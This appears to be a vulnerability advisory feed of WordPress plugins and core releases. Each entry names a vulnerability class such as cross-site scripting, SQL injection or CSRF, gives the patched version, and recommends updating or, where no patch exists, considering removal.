Plugin: Post to CSV by BestWebSoft

Vulnerability: Authenticated (Author+) CSV Injection
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated SQL Injection
Patched Version: 12.0.8
Recommended Action: Update to version 12.0.8, or a newer patched version

Plugin: CM WordPress Search And Replace Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: WP-RecentComments

Vulnerability: Unauthenticated Information Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Erident Custom Login and Dashboard

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Zoho SalesIQ – Live chat, chatbots, and visitor tracking

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Lava Directory Manager

Vulnerability: Unauthenticated Stored Cross-Site Scripting via New Listing
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP OAuth Server (OAuth Authentication)

Vulnerability: Cross-Site Request Forgery to Arbitrary Post Deletion (wo_ajax_remove_client)
Patched Version: 4.2.5
Recommended Action: Update to version 4.2.5, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Unauthenticated Blind SQL Injection via time Parameter
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: Advanced Forms for ACF

Vulnerability: Insecure Direct Object Reference
Patched Version: 1.6.9
Recommended Action: Update to version 1.6.9, or a newer patched version

Plugin: iFeature Slider

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Mailrelay

Vulnerability: Cross-Site Request Forgery via render_admin_page
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Cookie Information | Free GDPR Consent Solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: WPS Child Theme Generator

Vulnerability: Directory Traversal
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: My Tickets – Accessible Event Ticketing

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.11
Recommended Action: Update to version 1.9.11, or a newer patched version

Plugin: WordPress支付宝Alipay|财付通Tenpay|贝宝PayPal集成插件

Vulnerability: Cross-Site Scripting
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 5.0.9
Recommended Action: Update to version 5.0.9, or a newer patched version

Plugin: Mingle Forum

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.33.2
Recommended Action: Update to version 1.0.33.2, or a newer patched version

Plugin: WordPress Users

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.13.60
Recommended Action: Update to version 1.13.60, or a newer patched version

Plugin: WP-DBManager

Vulnerability: Arbitrary File Read
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: WP eCommerce

Vulnerability: SQL Injection
Patched Version: 3.11.4
Recommended Action: Update to version 3.11.4, or a newer patched version

Plugin: Registrations for the Events Calendar – Event Registration Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission – WP User Frontend

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.5.25
Recommended Action: Update to version 3.5.25, or a newer patched version

Plugin: Post Connector

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: RSS Feed Reader

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.14.12
Recommended Action: Update to version 1.14.12, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Missing Authorization to Non-Arbitrary File Upload
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: 1g-music-share

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Stock in & out

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.67
Recommended Action: Update to version 1.3.67, or a newer patched version

Plugin: Shop as a Customer for WooCommerce

Vulnerability: Authenticated (Shop Manager+) Privilege Escalation
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Analyticator

Vulnerability: Cross-Site Scripting
Patched Version: 6.4.9.6
Recommended Action: Update to version 6.4.9.6, or a newer patched version

Plugin: Urvanov Syntax Highlighter

Vulnerability: Cross-Site Request Forgery via init_ajax
Patched Version: 2.8.34
Recommended Action: Update to version 2.8.34, or a newer patched version

Plugin: Donation Platform for WooCommerce: Fundraising & Donation Management

Vulnerability: Cross-Site Request Forgery to Survey Submission
Patched Version: 1.2.10
Recommended Action: Update to version 1.2.10, or a newer patched version

Plugin: WPGraphQL WooCommerce

Vulnerability: Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Hide Post

Vulnerability: Cross-Site Request Forgery via save_bulk_edit_data
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Database Reset

Vulnerability: Privilege Escalation
Patched Version: 3.15
Recommended Action: Update to version 3.15, or a newer patched version

Plugin: Form Builder | Create Responsive Contact Forms

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.8.5
Recommended Action: Update to version 1.9.8.5, or a newer patched version

Plugin: Role Scoper (Obsolete – Please install PublishPress Permissions)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.67
Recommended Action: Update to version 1.3.67, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.3.9
Recommended Action: Update to version 5.3.9, or a newer patched version

Plugin: WordPress Processing Embed

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Notices

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: InBoundio Marketing

Vulnerability: Arbitrary File Upload
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Relevanssi – A Better Search (Pro)

Vulnerability: Missing Authorization
Patched Version: 2.16.5
Recommended Action: Update to version 2.16.5, or a newer patched version

Plugin: Participants Database

Vulnerability: Missing Authorization
Patched Version: 2.5.6
Recommended Action: Update to version 2.5.6, or a newer patched version

Plugin: Throws SPAM Away

Vulnerability: Cross-Site Request Forgery to Comment Modification
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: WordPress Filter Gallery Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.1.6
Recommended Action: Update to version 0.1.6, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Directory Traversal
Patched Version: 2.0.40
Recommended Action: Update to version 2.0.40, or a newer patched version

Core: WordPress

Vulnerability: Missing Session Cookie Expiration
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Email Log

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Conditional Fields for Contact Form 7

Vulnerability: Missing Authorization
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Cimy Header Image Rotator

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bloom Email Opt-In

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: NMI Gateway For WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Download Monitor

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.5.4
Recommended Action: Update to version 3.5.4, or a newer patched version

Plugin: Meks Audio Player

Vulnerability: Cross-Site Request Forgery via meks_remove_notification
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: efence

Vulnerability: Multiple Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Webmention

Vulnerability: Reflected Cross-Site Scripting via ‘replytocom’
Patched Version: 4.0.9
Recommended Action: Update to version 4.0.9, or a newer patched version

Plugin: WP Downgrade | Specific Core Version

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Contact Form 7 Captcha

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 0.0.9
Recommended Action: Update to version 0.0.9, or a newer patched version

Plugin: Bradesco Gateway

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: IP Blacklist Cloud

Vulnerability: Authenticated (Admin+) Path Traversal
Patched Version: 3.43
Recommended Action: Update to version 3.43, or a newer patched version

Plugin: Easy Google Adsense and Banner Ads Manager – AdsforWP

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Asgaros Forum

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.15.14
Recommended Action: Update to version 1.15.14, or a newer patched version

Core: WordPress

Vulnerability: Full Path Disclosure
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: FOX – Currency Switcher Professional for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 1.3.9.3
Recommended Action: Update to version 1.3.9.3, or a newer patched version

Plugin: sintic_gallery

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Auto Publish for Google My Business

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: WordPress + Microsoft Office 365 / Azure AD | LOGIN

Vulnerability: Authentication Bypass
Patched Version: 11.7
Recommended Action: Update to version 11.7, or a newer patched version

Plugin: Email Subscriber

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Everest Forms – Build Contact Forms, Surveys, Polls, Quizzes, Newsletter & Application Forms, and Many More with Ease!

Vulnerability: SQL Injection
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.5.1
Recommended Action: Update to version 4.5.1, or a newer patched version

Plugin: OWM Weather

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.6.12
Recommended Action: Update to version 5.6.12, or a newer patched version

Plugin: Advance Menu Manager

Vulnerability: Cross-Site Request Forgery to Menu Edition
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Revamp CRM for WooCommerce

Vulnerability: Local File Inclusion
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: WP ULike – All-in-One Engagement Toolkit

Vulnerability: Race Condition
Patched Version: 4.6.5
Recommended Action: Update to version 4.6.5, or a newer patched version

Plugin: Advanced Order Export For WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.8
Recommended Action: Update to version 3.1.8, or a newer patched version

Plugin: Contact Form by Supsystic

Vulnerability: SQL Injections
Patched Version: 1.7.11
Recommended Action: Update to version 1.7.11, or a newer patched version

Plugin: illi Link Party!

Vulnerability: Missing Authorization to Unauthenticated Arbitrary Link Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Navis DocumentCloud

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.1.1
Recommended Action: Update to version 0.1.1, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 7.3.11
Recommended Action: Update to version 7.3.11, or a newer patched version

Plugin: wp-forum

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Noindex Nofollow Tool

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cart66 Lite :: WordPress Ecommerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.1.15
Recommended Action: Update to version 1.5.1.15, or a newer patched version

Plugin: Allow PHP in Posts and Pages

Vulnerability: Authenticated (Subscriber+) Remote Code Execution via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Text Hover

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: HUSKY – Products Filter Professional for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.4.4
Recommended Action: Update to version 1.3.4.4, or a newer patched version

Plugin: School Management System for WordPress

Vulnerability: Authenticated (Student+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MySliderGallery

Vulnerability: Remote File Inclusion
Patched Version: 1.4b5
Recommended Action: Update to version 1.4b5, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.7.6
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.6, 3.8.6, 3.9.4, 4.0.2, 4.1.2

Plugin: WP Meta and Date Remover

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting via settings
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Game Server Status

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ClickFunnels

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tiempo.com

Vulnerability: Cross-Site Request Forgery to Shortcode Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.14
Recommended Action: Update to version 3.2.14, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.21.3
Recommended Action: Update to version 2.21.3, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.56
Recommended Action: Update to version 1.3.56, or a newer patched version

Plugin: Accordion Slider

Vulnerability: Missing Authorization to Notice Dismissal
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Mobile Assistant Connector

Vulnerability: SQL Injection
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Embedded Video

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds

Vulnerability: Unauthenticated SQL Injection
Patched Version: 4.3
Recommended Action: Update to version 4.3, or a newer patched version

Plugin: Schema App Structured Data

Vulnerability: Missing Authorization via page_init
Patched Version: 1.22.4
Recommended Action: Update to version 1.22.4, or a newer patched version

Plugin: WP-Stats

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.52
Recommended Action: Update to version 2.52, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Sensitive Information Exposure
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Locations

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Remote Code Execution via Remote File Inclusion
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Recall Products

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Divi Builder

Vulnerability: Arbitrary File Upload
Patched Version: 4.5.3
Recommended Action: Update to version 4.5.3, or a newer patched version

Plugin: Product Category Tree

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Webcam Microphone Screen Recorder HTML5

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.55.5
Recommended Action: Update to version 1.55.5, or a newer patched version

Plugin: Images Asynchronous Load

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.06
Recommended Action: Update to version 1.06, or a newer patched version

Plugin: WordPress Multisite Content Copier/Updater Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: enigma-chartjs

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.73
Recommended Action: Update to version 1.73, or a newer patched version

Plugin: JS Job Manager

Vulnerability: Arbitrary Plugin Installation/Activation
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Advanced AJAX Product Filters

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.4.7
Recommended Action: Update to version 1.5.4.7, or a newer patched version

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Image Optimization by Optimole – Lazy Load, CDN, Convert WebP & AVIF

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: YOP Poll

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: YouTube Embed, Playlist and Popup by WpDevArt

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.6.4
Recommended Action: Update to version 2.6.4, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Unauthenticated Stored Cross-Site Scripting via headers
Patched Version: 21.2.8.1
Recommended Action: Update to version 21.2.8.1, or a newer patched version

Plugin: Simple Wp Sitemap

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Open Close WooCommerce Store – Best Business Schedules Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: OneClick Chat to Order

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Authenticated Path Traversal
Patched Version: 2.4.20
Recommended Action: Update to version 2.4.20, or a newer patched version

Plugin: Easy Redirect Manager

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Missing Authorization
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: WP Comment Remix

Vulnerability: SQL Injection
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.47
Recommended Action: Update to version 1.1.47, or a newer patched version

Plugin: SupportFlow

Vulnerability: Stored Cross-Site Scripting via discussion ticket title
Patched Version: 0.7
Recommended Action: Update to version 0.7, or a newer patched version

Plugin: HUSKY – Products Filter Professional for WooCommerce

Vulnerability: Products Filter for WooCommerce <= 1.1.9
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Keyword Meta

Vulnerability: Cross-Site Scripting
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Improper Authentication
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Post Views Counter

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Login Block IPs

Vulnerability: IP Spoofing to Protection Mechanism Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Privacy Policy Generator, Terms & Conditions Generator WordPress Plugin : WP Legal Pages

Vulnerability: WPLegalPages <= 2.7.0
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Image Intense

Vulnerability: SQL Injection
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: SQL Injection
Patched Version: 1.6.9
Recommended Action: Update to version 1.6.9, or a newer patched version

Plugin: Gift Up Gift Cards for WordPress and WooCommerce

Vulnerability: Cross-Site Request Forgery via consume_post
Patched Version: 2.22
Recommended Action: Update to version 2.22, or a newer patched version

Plugin: Qiniu Uploader

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy PayPal & Stripe Buy Now Button

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: FavIcon Switcher

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Reset Pro – Most Advanced WordPress Reset Tool

Vulnerability: Missing Authorization to Database Reset
Patched Version: 5.99
Recommended Action: Update to version 5.99, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_copy_id
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Ads Box

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cooked – Recipe Management

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.9.1
Recommended Action: Update to version 1.7.9.1, or a newer patched version

Plugin: Simple Tooltips

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Limit Attempts by BestWebSoft – WordPress Anti-Bot and Security Plugin for Login and Forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: WooCommerce Box Office

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.1.51
Recommended Action: Update to version 1.1.51, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Local File Inclusion
Patched Version: 0.8.5.8
Recommended Action: Update to version 0.8.5.8, or a newer patched version

Plugin: NotificationX – Live Sales Notification, WooCommerce Sales Popup, FOMO, Social Proof, Announcement Banner & Floating Notification Top Bar

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Disqus Comment System

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.76
Recommended Action: Update to version 2.76, or a newer patched version

Plugin: bbPress Login Register Links On Forum Topic Pages

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: Plotly

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Elementor Website Builder Pro

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

